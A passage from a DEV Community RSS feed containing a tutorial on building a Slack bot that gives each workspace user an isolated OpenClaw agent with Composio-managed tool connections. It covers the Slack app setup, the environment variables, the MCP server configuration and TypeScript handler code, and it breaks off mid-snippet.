<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Shrijal Acharya</title>
    <description>The latest articles on DEV Community by Shrijal Acharya (@shricodev).</description>
    <link>https://dev.to/shricodev</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg</url>
      <title>DEV Community: Shrijal Acharya</title>
      <link>https://dev.to/shricodev</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/shricodev"/>
    <language>en</language>
    <item>
      <title>How to Automate Your Slack Workspace with OpenClaw and Composio 🚀</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Thu, 16 Apr 2026 15:19:55 +0000</pubDate>
      <link>https://dev.to/composiodev/how-to-automate-your-slack-workspace-with-openclaw-and-composio-3lhc</link>
      <guid>https://dev.to/composiodev/how-to-automate-your-slack-workspace-with-openclaw-and-composio-3lhc</guid>
<description>&lt;p&gt;Your team already lives in Slack. Code reviews, project updates, and everything in between: it all happens there.&lt;/p&gt;

&lt;p&gt;But the moment you need to file a GitHub issue, check a Linear ticket, or send a follow-up email, you leave Slack, do the thing, and come back. That context switch adds up.&lt;/p&gt;

&lt;p&gt;What if your Slack workspace had an assistant that could do all of that for you, right in the thread, with an isolated OpenClaw instance per user and admin control? 🤯&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F34fzwp4wnc4g66m15gp2.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F34fzwp4wnc4g66m15gp2.gif" alt="shocked gif" width="480" height="252"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In this article, you'll learn how to automate an entire Slack workspace with an assistant that connects to your tools and takes actions, without you ever leaving Slack.&lt;/p&gt;




&lt;h2&gt;
  
  
  What's Covered
&lt;/h2&gt;

&lt;p&gt;Here’s a quick summary of what we’ll cover in this blog post:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The idea behind building a Slack bot around OpenClaw.&lt;/li&gt;
&lt;li&gt;How Composio lets each user connect their own tools.&lt;/li&gt;
&lt;li&gt;How OpenClaw powers replies and tool usage.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These are the main topics, but you'll pick up plenty of other things along the way.&lt;/p&gt;

&lt;p&gt;So, if you want to build a Slack-first (though not Slack-only) AI assistant with personal tool access for each user, this will give you a solid starting point.&lt;/p&gt;




&lt;h2&gt;
  
  
  What we're building
&lt;/h2&gt;

&lt;p&gt;We're building a Slack bot that brings OpenClaw into Slack.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 This isn't limited to Slack; you can use pretty much the same setup for something like Discord with its SDK, or for your own custom app. The idea remains the same.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Overall, the idea is to give every user in the workspace their own OpenClaw instance, which powers the AI assistant.&lt;/p&gt;

&lt;p&gt;That way, everything is isolated per user, and the admin can control which toolkits (GitHub, Linear, etc.) each user gets access to.&lt;/p&gt;

&lt;p&gt;Each user can connect their own tools with Composio, so the bot can chat and take actions using the tools they’ve authorized.&lt;/p&gt;

&lt;p&gt;Here's a quick look at the architecture:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fszdytuuqr202h16l1vvs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fszdytuuqr202h16l1vvs.png" alt="bot architecture" width="800" height="386"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Why Slack and how to create a Slack App?
&lt;/h2&gt;

&lt;p&gt;There's no big reason for choosing Slack other than that it supports slash commands and it's where most teams already work.&lt;/p&gt;

&lt;p&gt;For this, we first need a Slack app. If you don't already have one, follow the &lt;a href="https://docs.slack.dev/quickstart/" rel="noopener noreferrer"&gt;quickstart guide&lt;/a&gt; to create one.&lt;/p&gt;

&lt;p&gt;Once your app is created, enable Socket Mode so the bot can receive events without exposing a public webhook URL.&lt;/p&gt;

&lt;p&gt;Then add at least these &lt;strong&gt;Bot Token Scopes&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;app_mentions:read&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;chat:write&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;commands&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;im:history&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;im:read&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;users:read&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Subscribe to these &lt;strong&gt;Bot Events&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;app_mention&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;message.im&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And create these &lt;strong&gt;Slash commands&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;/connect&lt;/code&gt;: User connects a toolkit, e.g. &lt;code&gt;/connect &amp;lt;toolkit&amp;gt;&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/connections&lt;/code&gt;: User lists active connections&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/help&lt;/code&gt;: Shows usage summary&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/assign&lt;/code&gt;: Admin assigns an OpenClaw instance to a user&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/add-mcp-config&lt;/code&gt;: Admin registers an MCP Config from platform.composio.dev&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/add-auth-config&lt;/code&gt;: Admin links a toolkit to its Composio auth config&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/list-mcp-configs&lt;/code&gt;: Admin lists all registered MCP Configs&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Finally, copy these values, which you can find in the app settings, into your &lt;code&gt;.env&lt;/code&gt; file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;SLACK_BOT_TOKEN&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;xoxb-...
&lt;span class="nv"&gt;SLACK_APP_TOKEN&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;xapp-...
&lt;span class="nv"&gt;SLACK_SIGNING_SECRET&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Your &lt;code&gt;SLACK_BOT_TOKEN&lt;/code&gt; is the bot token itself, &lt;code&gt;SLACK_APP_TOKEN&lt;/code&gt; is the app-level token used for Socket Mode, and &lt;code&gt;SLACK_SIGNING_SECRET&lt;/code&gt; is used to verify that incoming requests actually come from Slack.&lt;/p&gt;
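&lt;p&gt;Since a missing token usually only surfaces later as a confusing connection error, it can help to validate all three up front. Here's a small sketch (the helpers below are our own, not part of the project):&lt;/p&gt;

```typescript
// Fail fast at startup when a required Slack credential is missing.
// requireEnv/loadSlackConfig are illustrative helpers, not project code.
function requireEnv(name: string): string {
  const value = process.env[name];
  if (!value) {
    throw new Error("Missing required environment variable: " + name);
  }
  return value;
}

function loadSlackConfig() {
  return {
    botToken: requireEnv("SLACK_BOT_TOKEN"),           // xoxb-...
    appToken: requireEnv("SLACK_APP_TOKEN"),           // xapp-... (Socket Mode)
    signingSecret: requireEnv("SLACK_SIGNING_SECRET"), // request verification
  };
}
```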


&lt;h2&gt;
  
  
  How to Set Up the Project
&lt;/h2&gt;

&lt;p&gt;It's fairly simple to get this project up and running. Follow these steps:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/shricodev/saas-openclaw-slackbot.git
&lt;span class="nb"&gt;cd &lt;/span&gt;saas-openclaw-slackbot
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Next, install the dependencies:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npm &lt;span class="nb"&gt;install&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Then set up the environment variables in your &lt;code&gt;.env&lt;/code&gt; file:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Slack&lt;/span&gt;
&lt;span class="nv"&gt;SLACK_BOT_TOKEN&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;xoxb-...
&lt;span class="nv"&gt;SLACK_APP_TOKEN&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;xapp-...
&lt;span class="nv"&gt;SLACK_SIGNING_SECRET&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;...

&lt;span class="c"&gt;# Database&lt;/span&gt;
&lt;span class="nv"&gt;DATABASE_URL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;...

&lt;span class="c"&gt;# Composio api key (ak...) from https://platform.composio.dev&lt;/span&gt;
&lt;span class="nv"&gt;COMPOSIO_API_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"ak_..."&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;To get the Composio API key:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Log in at &lt;a href="https://platform.composio.dev/" rel="noopener noreferrer"&gt;platform.composio.dev&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Copy your API key (&lt;code&gt;ak_...&lt;/code&gt;) from the Composio dashboard settings, then set it as &lt;code&gt;COMPOSIO_API_KEY&lt;/code&gt; in your &lt;code&gt;.env&lt;/code&gt; file&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjacffrcue8r6sct5ddev.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjacffrcue8r6sct5ddev.png" alt="composio api key" width="800" height="399"&gt;&lt;/a&gt;&lt;/p&gt;


&lt;h2&gt;
  
  
  Configure Composio Dedicated MCP Server
&lt;/h2&gt;

&lt;p&gt;In this section, we'll go through the process of creating a dedicated MCP server in Composio for each user.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;First, head over to &lt;a href="https://platform.composio.dev" rel="noopener noreferrer"&gt;platform.composio.dev&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Under the MCP Configs tab, create a &lt;strong&gt;Dedicated MCP Server&lt;/strong&gt;. This lets you create MCP servers with specific apps and tools, which is exactly what we want.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo7qlbr4p0vmmtyxkdf3t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo7qlbr4p0vmmtyxkdf3t.png" alt="composio dedicated MCP server creation" width="800" height="400"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol start="3"&gt;
&lt;li&gt;Select all the toolkits you plan to assign to the user, then create the MCP server.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo218r8j44g593yqlrvkk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo218r8j44g593yqlrvkk.png" alt="composio toolkits" width="800" height="400"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol start="4"&gt;
&lt;li&gt;For the External User ID, use the user's Slack user ID. To get someone's Slack user ID, head over to their profile, click the three dots, and select &lt;strong&gt;Copy Member ID&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F25u16lvsh5h94z9d4em2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F25u16lvsh5h94z9d4em2.png" alt="slack user id" width="800" height="410"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Use that as the External User ID.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs98p5tahcxw9ikfogngu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs98p5tahcxw9ikfogngu.png" alt="external user id naming composio" width="800" height="192"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Keep note of the &lt;strong&gt;MCP config name&lt;/strong&gt; and &lt;strong&gt;MCP config ID&lt;/strong&gt;. You will need both when configuring the bot in Slack.&lt;/p&gt;

&lt;p&gt;Once the server is created, you'll find its URL:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv5kwmuvboz09uitypcw3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv5kwmuvboz09uitypcw3.png" alt="composio dedicated mcp server url" width="800" height="394"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;You can copy this URL directly and add it to the OpenClaw config, which we’ll cover later in the Configure OpenClaw with Composio section. Alternatively, the bot can fetch it for you after you run the &lt;code&gt;/assign&lt;/code&gt; slash command, which we’ll configure later.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;You will also need the auth config ID tied to the tools you selected. In the MCP server, head over to the &lt;strong&gt;Manage Config&lt;/strong&gt; tab and click &lt;strong&gt;Manage Auth Config&lt;/strong&gt;. The auth config ID is listed on that page.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxmo9o16fcq5tmfezu9ua.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxmo9o16fcq5tmfezu9ua.png" alt="composio auth config" width="800" height="394"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Keep note of this as well. You will need it when running &lt;code&gt;/add-auth-config&lt;/code&gt; in Slack.&lt;/p&gt;
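&lt;p&gt;To summarize how these pieces fit together, the admin commands essentially populate two small lookup tables that &lt;code&gt;/connect&lt;/code&gt; consults. Here's a sketch (the field names are our own; the project's actual Prisma schema may differ):&lt;/p&gt;

```typescript
// What /add-mcp-config stores: one row per Dedicated MCP Server.
interface McpConfig {
  id: string;             // MCP config ID from platform.composio.dev
  name: string;           // MCP config name
  toolkitSlugs: string[]; // toolkits enabled on the Dedicated MCP Server
}

// What /add-auth-config stores: a toolkit mapped to its auth config ID.
interface AuthConfigEntry {
  toolkitSlug: string;    // e.g. "github"
  authConfigId: string;   // the ID from the Manage Auth Config page
}

// /connect succeeds only when the caller has an assigned MCP Config,
// the requested toolkit is in that config, and an auth config exists.
function canConnect(
  assigned: McpConfig | undefined,
  authConfigs: AuthConfigEntry[],
  toolkit: string,
): boolean {
  if (!assigned) return false;
  if (!assigned.toolkitSlugs.includes(toolkit)) return false;
  return authConfigs.some((entry) => entry.toolkitSlug === toolkit);
}
```

&lt;p&gt;In the real bot these records live in PostgreSQL, but the gating logic is the same: no assigned MCP Config, a toolkit missing from the config, or no registered auth config each cause the connection attempt to be rejected.&lt;/p&gt;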


&lt;h2&gt;
  
  
  Core Components in the Application
&lt;/h2&gt;

&lt;p&gt;We're not going to code everything from scratch as that'd be too long and impractical. Let's go over some of the core components in the project.&lt;/p&gt;

&lt;p&gt;Before we start with the project core components, here's the project tech stack:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://slack.dev/bolt-js/" rel="noopener noreferrer"&gt;Slack Bolt&lt;/a&gt;&lt;/strong&gt; - Official Slack bot framework. We use it with Socket Mode, which connects to Slack over a WebSocket without needing a public HTTP endpoint.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://openclaw.ai/" rel="noopener noreferrer"&gt;OpenClaw&lt;/a&gt;&lt;/strong&gt; - The agent layer. Exposes an OpenAI-compatible API but acts as a full agentic gateway that plans, calls tools, and reasons over results.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://composio.dev/" rel="noopener noreferrer"&gt;Composio&lt;/a&gt;&lt;/strong&gt; - The core of the project. Manages OAuth connections to external apps like GitHub, Linear, and Gmail, and exposes them to the agent via MCP.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;TypeScript&lt;/strong&gt; - An obvious choice over JavaScript, since we get type-safe code.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PostgreSQL + Prisma&lt;/strong&gt; - Handles user records, connection status, and per-thread conversation history.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Bootstrapping the Bot
&lt;/h3&gt;

&lt;p&gt;This is where everything starts. We initialize the Slack Bolt app with Socket Mode, register all handlers, and start the server.&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// 👇 app.ts&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;app&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;App&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;token&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;SLACK_BOT_TOKEN&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="na"&gt;appToken&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;SLACK_APP_TOKEN&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="na"&gt;signingSecret&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;SLACK_SIGNING_SECRET&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="na"&gt;socketMode&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="nf"&gt;registerMessageHandlers&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;app&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nf"&gt;registerCommandHandlers&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;app&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;async &lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;port&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Number&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;PORT&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="mi"&gt;3000&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;app&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;start&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;port&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;`Bot is running on port &lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;port&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt; (socket mode)`&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;})();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Instead of exposing a public HTTP endpoint for Slack to POST events to, Socket Mode opens a WebSocket connection. This means you can run the bot anywhere, be it your local machine or a private server, without a public URL.&lt;/p&gt;

&lt;p&gt;If you've worked with bots before, this should be pretty straightforward to understand. 👀&lt;/p&gt;
&lt;h3&gt;
  
  
  Handling User Messages
&lt;/h3&gt;

&lt;p&gt;This is the brain of the bot. It handles both direct messages and &lt;code&gt;@mentions&lt;/code&gt; in channels.&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// 👇 message.handler.ts&lt;/span&gt;

&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;handleUserMessage&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="nx"&gt;message&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;client&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;text&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;channelId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nx"&gt;threadTs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;saveMessage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="nx"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;slackTeamId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;channelId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;threadTs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;user&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;text&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;);&lt;/span&gt;

  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;history&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;getThreadHistory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="nx"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;slackTeamId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;channelId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;threadTs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;priorHistory&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;history&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;slice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;thinkingMsg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;chat&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;postMessage&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="na"&gt;channel&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;channelId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;thread_ts&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;threadTs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
